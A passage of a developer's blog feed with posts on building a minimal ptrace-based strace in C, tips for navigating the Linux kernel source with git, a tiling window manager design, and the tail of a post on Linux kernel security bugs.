If you run a Linux machine with untrusted local users, or with services that are at risk of being compromised (e.g. your favorite shitty PHP webapp), you&#8217;d better have a story for how you&#8217;re dealing with these bugs. Including the fact that some of these were privately known for years before they were announced.
</li>
<li>
It&#8217;s not clear from this sample that the kernel is getting more secure over time. I suspect we&#8217;re getting better at finding bugs, particularly now that companies like Google are paying researchers to audit the kernel, but it&#8217;s not obvious we&#8217;re getting better at not introducing them in the first place. Certainly CVE-2010-3301 is pretty embarrassing, being a reintroduction of a bug that had been fixed seven months previously.
</li>
</ul></p>

<div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> <code>mmap_min_addr</code> mitigated this bug to a DoS, but several bugs that allowed attackers to get around that restriction were announced at the same time.
</p>
<p class="footnote"><sup><a class="footnum" name="fn.2" href="#fnr.2">2</a></sup> The public exploit relies on a call path introduced in 2.6.26, but observers have pointed out <a href="http://www.webhostingtalk.com/showpost.php?p=7026467&#038;postcount=192">the possibility</a> of exploit vectors affecting older kernels.
</p>
</div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/09/a-brief-look-at-linuxs-security-record/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Write yourself an strace in 70 lines of code</title>
		<link>http://blog.nelhage.com/2010/08/write-yourself-an-strace-in-70-lines-of-code/</link>
		<comments>http://blog.nelhage.com/2010/08/write-yourself-an-strace-in-70-lines-of-code/#comments</comments>
		<pubDate>Sun, 29 Aug 2010 16:33:26 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Software Engineering]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[ptrace]]></category>
		<category><![CDATA[software]]></category>
		<category><![CDATA[strace]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=300</guid>
		<description><![CDATA[Basically anyone who&#8217;s used Linux for any amount of time eventually comes to know and love the strace command. strace is the system-call tracer, which traces the calls that a program makes into the kernel in order to interact with the outside world. If you&#8217;re not already familiar with this incredibly versatile tool, I suggest [...]]]></description>
			<content:encoded><![CDATA[<p>Basically anyone who&#8217;s used Linux for any amount of time eventually
comes to know and love the <a href="http://linux.die.net/man/1/strace"><code>strace</code></a> command. <code>strace</code> is the
system-call tracer, which traces the calls that a program makes into
the kernel in order to interact with the outside world. If you&#8217;re not
already familiar with this incredibly versatile tool, I suggest you go
check out my friend and coworker Greg Price&#8217;s excellent <a href="http://blog.ksplice.com/2010/08/strace-the-sysadmins-microscope/">blog
post</a> on the subject, and then come back here.</p>

<p>We all love strace, but have you ever wondered how it works? How does
it interject itself between the kernel and the userspace program? This
post will walk through a minimal implementation of <code>strace</code> in about
70 lines of C. It won&#8217;t be nearly as functional as the real thing, but
in the process you&#8217;ll learn most of what you need to know about the
core interfaces it uses.</p>

<p>On Linux (and probably some other UNIXes) <code>strace</code> uses a somewhat
arcane interface known as <a href="http://linux.die.net/man/2/ptrace"><code>ptrace</code></a>, the process-tracing
interface. <code>ptrace</code> allows one proccess to monitor the status of
another process, and to inspect (or even manipulate) its internal
state.</p>

<p><code>ptrace</code> is a complex system call, taking a magic &#8220;request&#8221; first
parameter, and doing completely different things depending on its
value. Its general prototype looks like:</p>

<pre><code>long ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data);
</code></pre>

<p>However, because different values of <code>request</code> use anywhere from zero
to three of the remaining parameters, <code>glibc</code> prototypes it as a
varargs function, allowing a a developer to only list as many
parameters as a given call needs.</p>

<p>In order for one process to trace another, it attaches to that
process, and temporarily becomes that process&#8217;s parent. When a process
is <code>ptrace</code>d, the tracer can ask for the child to stop whenever
various events happen, such as the child making a system call. When
this happens, the kernel will stop the child with <code>SIGTRAP</code>. Since the
tracer is now the child&#8217;s parent, it can thus watch for this using the
standard UNIX <code>waitpid</code> system call.</p>

<p>Our miniature <code>strace</code> will only support the <code>strace COMMAND</code> form of
<code>strace</code> (as opposed to <code>strace -p</code>), and we&#8217;ll only print syscall
numbers and return values &#8212; no decoding of names or arguments or
anything. So a sample run might look like:</p>

<pre><code>$ ./ministrace ls
…
syscall(6) = 0
syscall(54) = 0
syscall(54) = 0
syscall(5) = 3
syscall(221) = 1
syscall(220) = 272
syscall(220) = 0
syscall(6) = 0
syscall(197) = 0
syscall(192) = -1219706880
…
</code></pre>

<p>Not the most useful thing in the world, but it shows off the core
tracing tools. So, let&#8217;s see the code:</p>

<pre><code>#include &lt;sys/ptrace.h&gt;
#include &lt;sys/reg.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;stdio.h&gt;
#include &lt;errno.h&gt;
#include &lt;string.h&gt;
</code></pre>

<p>We start with the necessary headers. <code>sys/ptrace.h</code> defines <code>ptrace</code>
and the <code>__ptrace_request</code> constants, and we&#8217;ll need <code>sys/reg.h</code> to
help decode system calls. More about that later. Everything else you
should probably recognize.</p>

<pre><code>int do_child(int argc, char **argv);
int do_trace(pid_t child);

int main(int argc, char **argv) {
    if (argc &lt; 2) {
        fprintf(stderr, "Usage: %s prog args\n", argv[0]);
        exit(1);
    }

    pid_t child = fork();
    if (child == 0) {
        return do_child(argc-1, argv+1);
    } else {
        return do_trace(child);
    }
}
</code></pre>

<p>We&#8217;ll start with the entry point. We check that we were passed a
command, and then we <code>fork()</code> to create two processes &#8212; one to
execute the program to be traced, and the other to trace it.</p>

<pre><code>int do_child(int argc, char **argv) {
    char *args [argc+1];
    memcpy(args, argv, argc * sizeof(char*));
    args[argc] = NULL;
</code></pre>

<p>The child starts with some trivial marshalling of arguments, since
<code>execvp</code> wants a <code>NULL</code>-terminated argument array.</p>

<pre><code>    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    return execvp(args[0], args);
}
</code></pre>

<p>Next, we just execute the provided argument list, but first, we need
to start the tracing process, so that the parent can start tracing the
newly-executed program from the very start.</p>

<p>If a child knows that it wants to be traced, it can make the
<code>PTRACE_TRACEME</code> <code>ptrace</code> request, which starts tracing. In addition,
it means that the next signal sent to this process wil stop it and
notify the parent (via <code>wait</code>), so that the parent knows to start
tracing. So, after doing a <code>TRACEME</code>, we <code>SIGSTOP</code> ourselves, so that
the parent can continue our execution with the <code>exec</code> call.</p>

<p>(You might have noticed that <code>strace COMMAND</code> output always starts
with an <code>execve</code> call. Now you should understand why &#8212; we&#8217;re actually
going to start tracing immediately after the <code>kill</code> returns, so we see
the <code>execve</code> call that starts the new program).</p>

<pre><code>int wait_for_syscall(pid_t child);

int do_trace(pid_t child) {
    int status, syscall, retval;
    waitpid(child, &amp;status, 0);
</code></pre>

<p>In the parent, meanwhile, we prototype a function we&#8217;ll need later,
and start tracing. We immediately <code>waitpid</code> on the child, which will
return once the child has sent itself the <code>SIGSTOP</code> above, and is
ready to be traced.</p>

<pre><code>    ptrace(PTRACE_SETOPTIONS, child, 0, PTRACE_O_TRACESYSGOOD);
</code></pre>

<p>I mentioned earliar that <code>ptrace</code> turns basically all events into a
<code>SIGTRAP</code> on the child. This is inconvenient because it means that
when you see the child has stopped due to <code>SIGTRAP</code>, there&#8217;s no good
way to know which of several possible reasons it stopped for.</p>

<p><code>PTRACE_SETOPTIONS</code> lets us set a number of options for how we want to
trace the child. We use it here to set <code>PTRACE_O_TRACESYSGOOD</code>, which
means that when the child stops for a syscall-related reason, we&#8217;ll
actually see it stopped with signal number <code>SIGTRAP | 0x80</code>, so we can
easily distinguish syscall stops from other stops. Since (for the
purposes of this demo), we only care about syscalls, this is very
convenient.</p>

<pre><code>    while(1) {
        if (wait_for_syscall(child) != 0) break;
</code></pre>

<p>Now we enter the tracing loop. <code>wait_for_syscall</code>, defined below, will
run the child until either entry to or exit from a system call. If it
returns non-zero, the child has exited and we end the loop.</p>

<pre><code>        syscall = ptrace(PTRACE_PEEKUSER, child, sizeof(long)*ORIG_EAX);
        fprintf(stderr, "syscall(%d) = ", syscall);
</code></pre>

<p>Otherwise, though, we know that the child is entering a system call,
and so we need to decode the system call number (and potentially
arguments, if this were a less toy example). The <code>PTRACE_PEEKUSER</code>
<code>ptrace</code> request reads a word of data from the child&#8217;s &#8220;user area&#8221;,
which is a logical area that holds all of its registers and other
internal non-memory state. On i386, the syscall number lives in
<code>%eax</code>. For various technical reasons, however, the kernel has already
clobbered the child&#8217;s <code>%eax</code> at this point, but it saves the original
value at a different offset, <code>ORIG_EAX</code>, which comes from
`sys/regs.h&#8217;.</p>

<pre><code>        if (wait_for_syscall(child) != 0) break;
</code></pre>

<p>Once we have the syscall number, we <code>wait_for_syscall</code> again, which
should leave us stopped at the syscall return.</p>

<pre><code>        retval = ptrace(PTRACE_PEEKUSER, child, sizeof(long)*EAX);
        fprintf(stderr, "%d\n", retval);
</code></pre>

<p>Return values on i386 are also passed in <code>%eax</code>, so this time we can
read it directly and print the return value, and then return to the
top of the loop to wait for the next syscall.</p>

<pre><code>     }
    return 0;
}
</code></pre>

<p>And once the child exits, we just return.</p>

<pre><code>int wait_for_syscall(pid_t child) {
    int status;
    while (1) {
        ptrace(PTRACE_SYSCALL, child, 0, 0);
</code></pre>

<p><code>wait_for_syscall</code> is a simple helper function. We continue the child
using <code>PTRACE_SYSCALL</code>, which allows a stopped child to continue
executing until the next entry to or exit from a system call.</p>

<pre><code>        waitpid(child, &amp;status, 0);
</code></pre>

<p>We then <code>waitpid</code> to wait for something interesting to happen in the
child.</p>

<pre><code>        if (WIFSTOPPED(status) &amp;&amp; WSTOPSIG(status) &amp; 0x80)
            return 0;
</code></pre>

<p>Because of the <code>PTRACE_O_SYSGOOD</code> we set above, we can detect a
syscall stop by checking if the child was stopped by a signal with the
high bit set. If so, we return.</p>

<pre><code>        if (WIFEXITED(status))
            return 1;
    }
}
</code></pre>

<p>If the child exited, we&#8217;re done here; Otherwise, it stopped for some
reason we don&#8217;t care about (like an <code>execve</code>, for instance), and so we
loop to start it again until it hits a syscall.</p>

<p>And that&#8217;s all there is to it. You can find the version I just posted on
<a href="http://github.com/nelhage/ministrace/tree/for-blog">github</a> if you want to download and try it out.</p>

<h2>Making it more useful</h2>

<p>While it works, the previous version isn&#8217;t exactly what I&#8217;d call particularly
helpful. You have to decode the syscall numbers by hand, and you don&#8217;t get any
syscall arguments.</p>

<p>It&#8217;s a little long to include in the post, but I&#8217;ve pushed a slightly more
functional version to <a href="http://github.com/nelhage/ministrace/tree/master">master</a> in the same github repository. It
includes a Python script to scan the Linux source to pick up syscall numbers and
argument counts and types, and it knows how to decode string arguments, so that
you can see filenames and <code>read</code> and <code>write</code> data.</p>

<p>Reading arguments is easy &#8212; on i386, they&#8217;re passed in registers, so it&#8217;s just
another <code>PTRACE_GETUSER</code> for each argument. Perhaps the most interesting piece
is the <code>read_string</code> function, which is used to read a NULL-terminated string
from the child process. (Of course, NULL-terminated isn&#8217;t quite right &#8212; the
real strace knows about the <code>count</code> arguments to <code>read()</code> and <code>write()</code>, for
instance. But it&#8217;s close enough for a demo):</p>

<pre><code>char *read_string(pid_t child, unsigned long addr) {
</code></pre>

<p><code>read_string</code> takes a child to read from, and the address of the string it&#8217;s
going to read.</p>

<pre><code>    char *val = malloc(4096);
    int allocated = 4096, read;
    unsigned long tmp;
</code></pre>

<p>We need some variables. A buffer to copy the string into, counters of how much
data we&#8217;ve copied and allocated, and a temporary variable for reading memory.</p>

<pre><code>    while (1) {
        if (read + sizeof tmp &gt; allocated) {
            allocated *= 2;
            val = realloc(val, allocated);
        }
</code></pre>

<p>We grow the buffer if necessary. We read data one word at a time.</p>

<pre><code>        tmp = ptrace(PTRACE_PEEKDATA, child, addr + read);
        if(errno != 0) {
            val[read] = 0;
            break;
        }
</code></pre>

<p><code>PTRACE_PEEKDATA</code> returns a work of data from the child at the specified
offset. Because it uses its return for the value, we need to check <code>errno</code> to
tell if it failed. If it did (perhaps because the child passed an invalid
pointer), we just return the string we&#8217;ve got so far, making sure to add our own
NULL at the end.</p>

<pre><code>        memcpy(val + read, &amp;tmp, sizeof tmp);
        if (memchr(&amp;tmp, 0, sizeof tmp) != NULL)
            break;
        read += sizeof tmp;
</code></pre>

<p>Then it&#8217;s a simple matter of appending the data we read, and breaking out if we
found a terminating NULL, or else looping to read another word.</p>

<pre><code>    }
    return val;
}
</code></pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/08/write-yourself-an-strace-in-70-lines-of-code/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Navigating the Linux Kernel</title>
		<link>http://blog.nelhage.com/2010/08/navigating-the-linux-kernel/</link>
		<comments>http://blog.nelhage.com/2010/08/navigating-the-linux-kernel/#comments</comments>
		<pubDate>Mon, 16 Aug 2010 01:52:58 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[source-diving]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=291</guid>
		<description><![CDATA[In response to my query last time, ezyang asked for any tips or tricks I have for finding my way around the Linux kernel. I&#8217;m not sure I have much in the way of systematic advice for tracking down the answers to questions about the Linux kernel, but thinking about what I do when posed [...]]]></description>
			<content:encoded><![CDATA[<p>In response to my query last time, <code>ezyang</code> <a href="http://blog.nelhage.com/2010/08/suggestion-time-what-should-i-blog-about/#comment-2597">asked</a> for any
tips or tricks I have for finding my way around the Linux kernel. I&#8217;m
not sure I have much in the way of systematic advice for tracking down
the answers to questions about the Linux kernel, but thinking about
what I do when posed with a patch to Linux that I need understand, or
question I need to answer, I&#8217;ve come up with a collection of tips that
will hopefully be helpful to others looking to source-dive Linux for
whatever reason.</p>

<h2>Know the layout</h2>

<p>It sounds basic, but you probably shouldn&#8217;t be doing any serious
source-diving into the Linux kernel without pausing to familiarize
yourself with the basic layout of the kernel sources. The most
interesting directories are:</p>

<ul>
<li><p><code>fs/</code> &#8212; This directory contains both the VFS implementation (the
generic filesystem code and the top-level implementation of
filesystem syscalls), and specific filesystems, in
subdirectories. If you&#8217;re looking for the implementation of a
filesystem-related system call, it&#8217;s probably in one of <code>fs/*.c</code>.</p></li>
<li><p><code>mm/</code> &#8212; This contains the virtual memory and memory management
subsystems. <code>mmap</code> lives here, as do all of the kernel&#8217;s various
memory allocators, including <code>kmalloc</code> and <code>vmalloc</code>.</p></li>
<li><p><code>kernel/</code> &#8212; This contains the &#8220;core&#8221; kernel code. The scheduler
lives here, as does the implementation of various primitives used
throughout the kernel, like <code>printk</code> and various data
structures. timer- and process- related system calls live here,
including <code>fork</code> and <code>exit</code>, and most anything related to uids and
pids.</p></li>
<li><p><code>net/</code> is the networking subsystem; much like <code>fs/</code> it contains both
generic code and specific network protocol
implementations. networking-related system calls are mostly in
<code>net/socket.c</code></p></li>
<li><p><code>arch/</code> &#8212; Architecture-specific code lives here, in
<code>arch/ARCHITECTURE/</code>. Per-architecture include files live in
<code>arch/ARCHITECTURE/include/asm/</code>; Prior to 2.6.28 they were in
<code>include/asm-ARCH/</code>. <code>arch/</code> directories tend to loosely parallel
the top-level source directory, with <code>kernel/</code> and <code>mm/</code>
subdirectories.</p></li>
</ul>

<h2>Know your git</h2>

<p>I find <code>git</code> is one of the most invaluable tools at my disposal when
trying to understand the Linux source. There are large classes of
questions about the source that git makes it easy to answer that I
otherwise would have to resort to something much slower or more
cumbersome to figure out. Some things I&#8217;ve found particularly useful
include:</p>

<ul>
<li><p><code>git grep</code> &#8212; <code>git grep</code> works almost identically to <code>grep</code>, but
instead of searching the files on disk, it searches the objects in
git&#8217;s object store. Because of the way this store is compressed and
designed for locality, it&#8217;s typically far faster at searching large
trees than the equivalent recursive grep would be. In addition, it
knows to ignore files that aren&#8217;t in source control, such as object
files.</p></li>
<li><p><code>git blame</code> &#8212; This one should be familiar to anyone who&#8217;s used
subversion or most any other version control system. This will let
you quickly find the commit that introduced a given line. This gives
you several potential sources of information:</p>

<ul>
<li>The commit message often includes helpful documentation on how a
change was supposed to work or what the bug it was fixing was.</li>
<li>The diff is often a quick way to find other files that are related
to the piece of code you&#8217;re looking at, potentially giving you
other places to look for more related code.</li>
</ul></li>
<li><p><code>git log -S</code> &#8212; while <code>git blame</code> can tell you when a specific line
was introduced, <code>git log -S</code>, also known for some inscrutable reason
as the &#8220;pickaxe&#8221;, will let you know when a specific chunk of code
was introduced. Here&#8217;s how it works:</p>

<p>Suppose I wanted to know when the <code>vmsplice</code> system call was
introduced. A <code>git grep</code> will reveal the line in <code>fs/splice.c</code> that
defines the system call:</p>

<pre><code>SYSCALL_DEFINE4(vmsplice, int, fd, const struct iovec __user *, iov,
                unsigned long, nr_segs, unsigned int, flags)
</code></pre>

<p>I could run <code>git blame</code>, but that points me at commit <code>836f92ad</code>,
which was just one of the commits that introduced the
<code>SYSCALL_DEFINEn</code> wrappers, which isn&#8217;t what I&#8217;m looking for. I
could continue <code>git blame</code>ing from there, but that&#8217;s really not what
I want.</p>

<p>Instead, I can run:</p>

<pre><code>git log -Svmsplice fs/splice.c
</code></pre>

<p>which yields two commits, the earliest of which is the one I want.</p>

<p>So, how does this work? When you use the pickaxe, with <code>-Sstring</code>,
git looks for commits that <em>add</em> or <em>remove</em> an instance of
<strong>string</strong>. It doesn&#8217;t look at the diff or anything &#8212; it simply
counts how often <strong>string</strong> appears before and after the commit, and
includes commits where the numbers are different.</p>

<p>So, <code>836f92ad</code>, which has the hunk:</p>

<pre><code>-asmlinkage long sys_vmsplice(int fd, const struct iovec __user *iov,
-                            unsigned long nr_segs, unsigned int flags)
+SYSCALL_DEFINE4(vmsplice, int, fd, const struct iovec __user *, iov,
+               unsigned long, nr_segs, unsigned int, flags)
</code></pre>

<p>doesn&#8217;t change the count of <code>vmsplice</code> instances, and isn&#8217;t flagged
by the pickaxe. But the commit that introduced <code>sys_vmsplice</code> in the
first place had to have, and so the pickaxe flags it.</p></li>
</ul>

<h2>Know your idioms</h2>

<p>One of the advantages of the centrally-controlled model of Linux,
where almost all changes, at least to the core code, are code-reviewed
extensively on the <a href="http://lkml.org/">LKML</a>, is that the code tends to have a very
high standard of stylistic and idiomatic consistency. So once you
learn some of the common idioms of kernel development, you can
recognize them everywhere, and infer information about the structure
of a piece of code without having to go read all of the details.</p>

<p>A corollary that I&#8217;ve found here is: Trust your instincts. If you
think you recognize a pattern in the code, or if there is some way in
which it seems like the code &#8220;ought to be working&#8221;, you&#8217;re usually
well served by assuming that your hunch is right and proceeding based
off of that, and coming back later to check your assumptions if
necessary, instead of stopping at every stop to verify your
guesses. Because the code is, in general, of very high quality and
consistency, once you start developing familiarity with it, your
guesses will be right far more often than not.</p>

<p>I won&#8217;t attempt to list an exhaustive list of design patterns and
idioms in the Linux kernel, but here are some it&#8217;s pretty essential to
be familiar with:</p>

<ul>
<li><p>The <code>_ops</code> struct &#8212; Linux uses an OO-esque style ubiquitously in
the kernel, where structs of function pointers (basically a
poor-man&#8217;s <code>vtable</code>, to you C++ programmers), are passed around and
stored to indicate how to work with some object. These <code>struct</code>s are
known as &#8220;ops&#8221; structures, and typically have types name
<code>FOO_operations</code>, and live in variables named <code>SOMETHING_ops</code> &#8211;
<code>struct super_operations</code>, <code>struct inode_operations</code>, <code>struct
file_operations</code>, and so on.</p></li>
<li><p><code>struct list_head</code>, defined in <code>include/linux/types.h</code>, with
operations in <code>include/linux/list.h</code> is used basically anywhere the
kernel needs to store linked lists. To save on space and reduce
fragmentation, the kernel uses a trick where <code>struct list_head</code>s are
stored inside the structures that are the element of a list, and
pointer arithmetic is used to compute the one from the
other. Familiarize yourself with <code>list.h</code>, since it&#8217;s a rare piece
of code that won&#8217;t use at least some of its functionality.</p></li>
<li><p><code>container_of</code> and related idioms. The trick I mentioned previously,
of storing a <code>list_head</code> inside a structure and using pointer
arithmetic, is generalized in many places, through the
<code>container_of</code> macro.</p>

<p>Let&#8217;s consider the problem of implementing a filesystem, say,
<code>ext2</code>. Linux&#8217;s VFS layer has a generic <code>inode</code> structure, that
store filesystem-independent information about inodes. <code>ext2</code>,
however, has some additional information it needs to store on each
in-memory inode. A standard userspace approach would be for <code>struct
inode</code> to contain a <code>void *userdata</code> pointer, and <code>ext2</code> could
allocate a <code>struct ext2_inode_info</code>, and point <code>userdata</code> at that.</p>

<p>This means that creating an inode needs two allocations, however,
which is inefficient and causes fragmentation in the memory
allocator, which is unacceptable in the kernel.</p>

<p>Instead, ext2 embeds the <code>struct inode</code> <em>inside</em> <code>struct
ext_inode_info</code>:</p>

<pre><code>/*
 * second extended file system inode data in memory
 */
struct ext2_inode_info {
        __le32  i_data[15];
        …
        struct inode    vfs_inode;
        …
};
</code></pre>

<p>(See <code>fs/ext2/ext2.h</code> for the full definition)</p>

<p>Then, whenever ext2 gets a callback from the VFS with a <code>struct
inode</code>, it can retrieve the <code>ext2_inode_info</code> using:</p>

<pre><code>static inline struct ext2_inode_info *EXT2_I(struct inode *inode)
{
        return container_of(inode, struct ext2_inode_info, vfs_inode);
}
</code></pre>

<p>This uses the <code>container_of</code> macro, which in this case is used to
find the object of type <code>ext2_inode_info</code> which contains the object
<code>inode</code> in the member named <code>vfs_inode</code>. The implementation of this
macro is somewhat hairy and relies on GCC extensions when available,
but you should be able to see that in the end it will compile down
to a simple subtraction &#8212; about as efficient as you could hope for.</p></li>
</ul>

<h2>Know your references</h2>

<p>While sourcediving is the ultimate way to answer any question about
the kernel, and is lots of fun to boot, don&#8217;t forget about the
possibility of documentation answering your question, or at least
pointing you in the right direction. Some places that are essential to
look include:</p>

<ul>
<li><p><a href="http://oreilly.com/catalog/9780596005658"><em>Understanding the Linux Kernel</em></a> &#8212; This book is an
incredibly detailed walkthrough of the inner implementation of
virtually every feature and subsystem in the kernel, as of version
2.6.11. It&#8217;s starting to show its age in some places, but it&#8217;s still
largely quite accurate, and is an essential guide to anyone who&#8217;s
serious about, well, understanding the Linux kernel.</p></li>
<li><p><a href="http://lwn.net/">LWN</a> &#8212; LWN (Linux Weekly News) is an excellent publication,
and anyone who hacks on Linux or cares about its development is
well-advised to subscribe. Rarely does a new feature go into Linux
without an incredibly detailed writeup on LWN, including the history
of the feature, details of its development, and a low-level
explanation of how it works and its APIs.</p>

<p>Even without a subscription, old articles are all freely available,
and you&#8217;re well-advised to search LWN&#8217;s <a href="http://lwn.net/Kernel/Index/">kernel index</a>
for anything applicable to your problem.</p></li>
<li><p>The LKML &#8212; The Linux Kernel Mailing List is where almost all the
action happens in the Linux development community. Few features go
in without being hotly debated on this mailing list, and discussions
often lend useful insight into the design and implementation of the
feature in question.</p>

<p>Because patches tend to be submitted to the LKML by email, a good
first step to trying to find discusion on a specific patch is just
to plug its subject (the first line of the commit message) into
Google or your favorite LKML archive&#8217;s search engine.</p></li>
</ul>

<p>Well, this has been quite the braindump. I hope this turns out to be
useful to someone, and please comment if you have other advice or
resources you recommend for getting into the Linux source code.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/08/navigating-the-linux-kernel/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>The Window Manager I Want</title>
		<link>http://blog.nelhage.com/2010/05/the-window-manager-i-want/</link>
		<comments>http://blog.nelhage.com/2010/05/the-window-manager-i-want/#comments</comments>
		<pubDate>Sun, 09 May 2010 21:08:47 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[emacs]]></category>
		<category><![CDATA[ratpoison]]></category>
		<category><![CDATA[ui]]></category>
		<category><![CDATA[window manager]]></category>
		<category><![CDATA[xmonad]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=220</guid>
		<description><![CDATA[Since I first discovered ratpoison in 2005 or so, I&#8217;ve basically exclusively used tiling window managers, going through, over the years, StumpWM, Ion 3, and finally XMonad. They&#8217;ve all had various strengths and weaknesses, but I&#8217;ve never been totally happy with any of them. This blog entry is a writeup of what I want to [...]]]></description>
			<content:encoded><![CDATA[<div id="outline-container-1" class="outline-2">
<div id="text-1">

<p>Since I first discovered <a href="http://www.nongnu.org/ratpoison/">ratpoison</a> in 2005 or so, I&#8217;ve basically
exclusively used tiling window managers, going through, over the
years, <a href="http://www.nongnu.org/stumpwm/">StumpWM</a>, <a href="http://en.wikipedia.org/wiki/Ion_(window_manager)">Ion 3</a>, and finally <a href="http://xmonad.org/">XMonad</a>. They&#8217;ve all had various
strengths and weaknesses, but I&#8217;ve never been totally happy with any
of them. This blog entry is a writeup of what I want to see as a
window manager. It&#8217;s possible that some day I&#8217;ll get annoyed enough to
write it, but maybe this post will inspire someone else to (Not
likely, but I can hope).
</p>

</div>

<div id="outline-container-1.1" class="outline-3">
<h3 id="sec-1.1">Layout </h3>
<div id="text-1.1">


<p>
At any given moment, the screen<sup><a class="footref" name="fnr.1" href="#fn.1">1</a></sup>
is divided into one or more <b>panes</b>. These panes always tile the
screen. Each pane may or may not currently be displaying a window. If
it is not, then the desktop will be displayed in that pane.
</p>
<p>
The primitive operations you can perform on the pane include, but are
not necessarily limited to:
</p>
<dl>
<dt>Split</dt><dd>
Splits the focused pane into two equally-sized panes,
either horizontally or vertically. One of the child panes
will display whichever window the previous pane displayed,
the other is empty.
</dd>
<dt>Resize</dt><dd>
Change the relative size of two child windows that were
split from the same parent.
</dd>
<dt>Kill Pane</dt><dd>
Destroy the current pane. If it is displaying a window,
that window is not sent a close message. The pane&#8217;s
sibling window expands to consume its space.
</dd>
<dt>Next/Previous pane</dt><dd>
Focus the next or previous pane. Panes are
ordered based on position on the screen, regardless of how they
were split to arrive at the current layout.
</dd>
<dt>Goto Pane</dt><dd>
Panes are numbered, based on their location on
screen. <code>Mod-N</code> focuses the Nth pane.

</dd>
</dl>
</div>

</div>

<div id="outline-container-1.2" class="outline-3">
<h3 id="sec-1.2">Selecting windows </h3>
<div id="text-1.2">


<p>
There is a global list of all windows. Windows are ordered arbitrarily
in this list (maybe based on the order they were opened?). Every
window has a name, which is initially set to the <code>WM_NAME</code> property
set by the window&#8217;s client.
</p>
<p>
The following operations are available to manipulate windows:
</p>
<dl>
<dt>Next/Previous Window</dt><dd>
Replace the window in the current panel with
the next or previous window in the list.
</dd>
<dt>Rename</dt><dd>
Prompts for a new name for the current window. If the user
enters an empty string, the window reverts to the default
behavior of using the <code>WM_NAME</code>.
</dd>
<dt>Goto Window</dt><dd>
Prompts for the name of a window to switch to. This
prompt matches on substrings or even sub-sequences of
the window name, displaying the result of the
selection as you type. After typing some characters,
you can scroll through the list to select an entry,
instead of completing typing.
</dd>
<dt>Kill</dt><dd>
Sends a close message to the window in the focused panel.

</dd>
</dl>
</div>

</div>

<div id="outline-container-1.3" class="outline-3">
<h3 id="sec-1.3">Desktops </h3>
<div id="text-1.3">


<p>
It seems likely I will want multiple desktops. Each desktop will have
its own pane layout. However, the window list is still global, not
per-desktop. <code>Goto Window</code> will always operate on the global window
list. Selecting a window that is visible through a pane somewhere else
causes that pane to become empty.
</p>
<p>
Alternately, there is no concept of multiple desktops. However, there
is the ability to save and restore layouts, meaning both the layout of
the panels on the screen, and the list of which window is in each
pane. The primary difference here is that a window can be associated
with multiple panes in different saved layouts, and gets resized/moved
as necessary as you switch panes. I suspect I like this model better.
</p>
</div>

</div>

<div id="outline-container-1.4" class="outline-3">
<h3 id="sec-1.4">Postscript </h3>
<div id="text-1.4">


<p>
If this sounds familiar to you, it probably should. What I&#8217;ve
described is essentially identical to how emacs manages buffers and
windows (analogous to X windows and panes in the above, respectively),
with <a href="http://www.emacswiki.org/emacs/window-number.el">window-number.el</a> and either <a href="http://www.emacswiki.org/emacs/IswitchBuffers">iswitchb</a> or <a href="http://www.emacswiki.org/emacs/InteractivelyDoThings">ido</a>. I manage hundreds
of buffers in emacs this way, and complicated screen layouts, whenever
I&#8217;m doing any hacking, and I love it.
</p>
<p>
I would in fact be tempted to write my window manager into emacs
itself, except for the annoying fact that emacs is very much
single-threaded. It&#8217;s already annoying enough when network drops and a
hung network filesystem takes down my emacs waiting for a timeout; It
would be utterly unacceptable if that took down my entire window
manager, too.
</p>

<p>
I&#8217;d alternately be tempted to try to make this an XMonad plugin, but I
think that it&#8217;s sufficiently different from XMonad&#8217;s data model that
the impedance mismatch would suck.
</p>

</div>
</div>
</div>

<p><div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> I&#8217;m only going to consider the
single-monitor case for now, but the generalization should be easy.
</p>
</div>
</div></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/05/the-window-manager-i-want/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>CVE-2007-4573: The Anatomy of a Kernel Exploit</title>
		<link>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/</link>
		<comments>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/#comments</comments>
		<pubDate>Sat, 06 Feb 2010 03:32:31 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=99</guid>
